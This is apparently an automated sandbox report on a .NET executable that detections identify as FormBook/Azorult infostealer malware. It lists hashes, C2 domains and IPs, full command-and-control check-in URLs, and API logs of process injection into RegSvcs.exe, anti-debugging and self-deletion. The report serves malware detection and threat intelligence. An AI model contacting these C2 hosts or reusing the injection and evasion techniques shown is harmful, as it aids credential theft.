Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 28, 2022, 9:03 a.m.	July 28, 2022, 9:39 a.m.

Size	1.0MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`5582e1c745e771410a2965357131b053`
SHA256	`fc0a722ccd7abbaf6207a391d1b2421e2ec710f9baadd3bfd58f30143af794a4`
CRC32	`5DBBFD8E`
ssdeep	`24576:j/w4UZvybcv8vPWU506NG633442rxv6H:b6d8X3PV2p6H`
Yara	IsPE32 - (no description) Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult Is_DotNET_EXE - (no description) PE_Header_Zero - PE File Signature

paa.exe "C:\Users\test22\AppData\Local\Temp\paa.exe"
2776
- RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2204
  - rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
    2388

Name	Response	Post-Analysis Lookup
www.sendermagic.business	A 104.21.88.31 A 172.67.150.76	104.21.88.31
www.greendairyfarm.com	A 156.246.230.253	156.246.230.253
www.mtprospects.com
www.iwon50199.com	A 103.183.154.35 CNAME kr78-site-02.cdn-ng.net	103.183.154.35
www.remont-1996.site	A 178.63.50.103	178.63.50.103
www.arseen.art	A 91.216.248.21 A 91.216.248.23 A 91.216.248.22	91.216.248.22
www.a23ch6.com	A 45.195.204.62 A 216.224.122.79 CNAME n-231.b.cloudfastly.net	45.195.204.62

IP Address	Status	Action
103.183.154.35	Active	Moloch
104.21.88.31	Active	Moloch
156.246.230.253	Active	Moloch
164.124.101.2	Active	Moloch
178.63.50.103	Active	Moloch
45.195.204.62	Active	Moloch
91.216.248.23	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49173 -> 104.21.88.31:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 104.21.88.31:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 104.21.88.31:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 91.216.248.23:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 91.216.248.23:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 91.216.248.23:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 178.63.50.103:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 178.63.50.103:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 178.63.50.103:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 45.195.204.62:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 45.195.204.62:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 45.195.204.62:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 156.246.230.253:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 156.246.230.253:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 156.246.230.253:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 103.183.154.35:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 103.183.154.35:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 103.183.154.35:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 28, 2022, 9:03 a.m.			0	0
IsDebuggerPresent July 28, 2022, 9:03 a.m.			0	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 28, 2022, 9:03 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.remont-1996.site/qoi4/?6l8P=bQk6Y1OkMVmb/cUeIaVSdyMq0XerQSbKTq49KKLDbjeZi+OpYPCssBxMKxcZx57KYghUYPJMCIWK/OKIKQpwDgud7rUmeilg3HLQVws=&llvt=fTUHuTCXE2JLWT
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.a23ch6.com/qoi4/?6l8P=mIg87o12jzktjGWoLXQStMIohSsxD92YnMqcbW5KBzVguoRlbdwo+XlYMzVr8y7x+BIPJY6XNjFnoxPODanDntHOZ+zgUXhg032Cr6w=&llvt=fTUHuTCXE2JLWT
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.arseen.art/qoi4/?6l8P=0TdWdSizF8c3LXpBIEScS6o3fxNG1Ql6R/OEopi7yMG7wr8kOtrHzbCevgANQN7bvkzFjl3F1wYe66IYUQjhPvSMhhAN3vf/1PX8mx8=&llvt=fTUHuTCXE2JLWT
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.iwon50199.com/qoi4/?6l8P=nB9x6MTouR6kXPwp0/2iZlq1skyCis32LbZuT8gqLva0MoDVg7giq6H0py4LQH3VAmtrwyRb2eO+DFheeiLtTogDgUDJXFJ06fxMgPg=&llvt=fTUHuTCXE2JLWT
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.greendairyfarm.com/qoi4/?6l8P=qgHH7vfSBq5MI1LUsjmLV+IKjIXhQCANWPpnI5yupmFwyIu0iF8qG57aZhjT00z0CZcbevcdEVr31L0MUgKgx65SWeX4ofARvhAtufU=&llvt=fTUHuTCXE2JLWT
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.sendermagic.business/qoi4/?6l8P=if7eE2IjIWIlbnxRL0vImw435VHyahisow6UE3OXQu7eX1NDLV+od3OPh/G+06YA0D2rYFym5cG5x/eq7x8mgvw//6g4zmHc1kkjGvE=&llvt=fTUHuTCXE2JLWT

Performs some HTTP requests (6 events)

request	GET http://www.remont-1996.site/qoi4/?6l8P=bQk6Y1OkMVmb/cUeIaVSdyMq0XerQSbKTq49KKLDbjeZi+OpYPCssBxMKxcZx57KYghUYPJMCIWK/OKIKQpwDgud7rUmeilg3HLQVws=&llvt=fTUHuTCXE2JLWT
request	GET http://www.a23ch6.com/qoi4/?6l8P=mIg87o12jzktjGWoLXQStMIohSsxD92YnMqcbW5KBzVguoRlbdwo+XlYMzVr8y7x+BIPJY6XNjFnoxPODanDntHOZ+zgUXhg032Cr6w=&llvt=fTUHuTCXE2JLWT
request	GET http://www.arseen.art/qoi4/?6l8P=0TdWdSizF8c3LXpBIEScS6o3fxNG1Ql6R/OEopi7yMG7wr8kOtrHzbCevgANQN7bvkzFjl3F1wYe66IYUQjhPvSMhhAN3vf/1PX8mx8=&llvt=fTUHuTCXE2JLWT
request	GET http://www.iwon50199.com/qoi4/?6l8P=nB9x6MTouR6kXPwp0/2iZlq1skyCis32LbZuT8gqLva0MoDVg7giq6H0py4LQH3VAmtrwyRb2eO+DFheeiLtTogDgUDJXFJ06fxMgPg=&llvt=fTUHuTCXE2JLWT
request	GET http://www.greendairyfarm.com/qoi4/?6l8P=qgHH7vfSBq5MI1LUsjmLV+IKjIXhQCANWPpnI5yupmFwyIu0iF8qG57aZhjT00z0CZcbevcdEVr31L0MUgKgx65SWeX4ofARvhAtufU=&llvt=fTUHuTCXE2JLWT
request	GET http://www.sendermagic.business/qoi4/?6l8P=if7eE2IjIWIlbnxRL0vImw435VHyahisow6UE3OXQu7eX1NDLV+od3OPh/G+06YA0D2rYFym5cG5x/eq7x8mgvw//6g4zmHc1kkjGvE=&llvt=fTUHuTCXE2JLWT

Allocates read-write-execute memory (usually to unpack itself) (50 out of 59 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00580000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e32000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02010000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0050c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00761000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00762000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00525000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00527000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00763000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0051a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0050a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00764000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73a22000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00516000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0076a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0076b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0076c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0076d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0076e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0076f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:03 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0050d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0050e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0050f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 28672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a45000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a4c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a4d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x075b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x075b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x075b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x075b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x075b8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c6f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x075b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Drops a binary and executes it (1 event)

file	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00100e00', u'virtual_address': u'0x00002000', u'entropy': 7.763284615827352, u'name': u'.text', u'virtual_size': u'0x00100d34'}

entropy

7.76328461583

description

A section with a high entropy has been found

entropy

0.982313575526

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW July 28, 2022, 9:04 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 28, 2022, 9:04 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 28, 2022, 9:04 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (9 events)

description	Used Formbook[m]	rule	Win_Trojan_Formbook_m_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: f780bf9d7e75a569bb4f1c275d832c8ed6e5f5b0

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2204 region_size: 184320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002d8	1	0	0

Deletes executed files from disk (1 event)

file	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 28, 2022, 9:04 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿáÈº´ Í!¸LÍ!This program cannot be run in DOS mode. $À¶b×]×]×]J§]Ë×]J]×]J]×]Rich×]PEL»Cà ¸pÐ@Ð@.text8¶¸ ` base_address: 0x00400000 process_identifier: 2204 process_handle: 0x000002d8	1	1	0
WriteProcessMemory July 28, 2022, 9:04 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2204 process_handle: 0x000002d8	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 28, 2022, 9:04 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿáÈº´ Í!¸LÍ!This program cannot be run in DOS mode. $À¶b×]×]×]J§]Ë×]J]×]J]×]Rich×]PEL»Cà ¸pÐ@Ð@.text8¶¸ ` base_address: 0x00400000 process_identifier: 2204 process_handle: 0x000002d8	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2776 called NtSetContextThread to modify thread in remote process 2204
NtSetContextThread July 28, 2022, 9:04 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4327536 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002d4 process_identifier: 2204	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2776 resumed a thread in remote process 2204
NtResumeThread July 28, 2022, 9:04 a.m.	thread_handle: 0x000002d4 suspend_count: 1 process_identifier: 2204	1	0	0

Executed a process and injected code into it, probably while unpacking (21 events)

Time & API	Arguments	Status	Return
NtResumeThread July 28, 2022, 9:03 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2776	1	0
NtResumeThread July 28, 2022, 9:03 a.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2776	1	0
NtResumeThread July 28, 2022, 9:03 a.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 2776	1	0
NtResumeThread July 28, 2022, 9:03 a.m.	thread_handle: 0x00000200 suspend_count: 1 process_identifier: 2776	1	0
NtGetContextThread July 28, 2022, 9:03 a.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread July 28, 2022, 9:03 a.m.	thread_handle: 0x000000e0	1	0
NtResumeThread July 28, 2022, 9:03 a.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2776	1	0
NtGetContextThread July 28, 2022, 9:03 a.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread July 28, 2022, 9:03 a.m.	thread_handle: 0x000000e0	1	0
NtResumeThread July 28, 2022, 9:03 a.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2776	1	0
NtResumeThread July 28, 2022, 9:04 a.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 2776	1	0
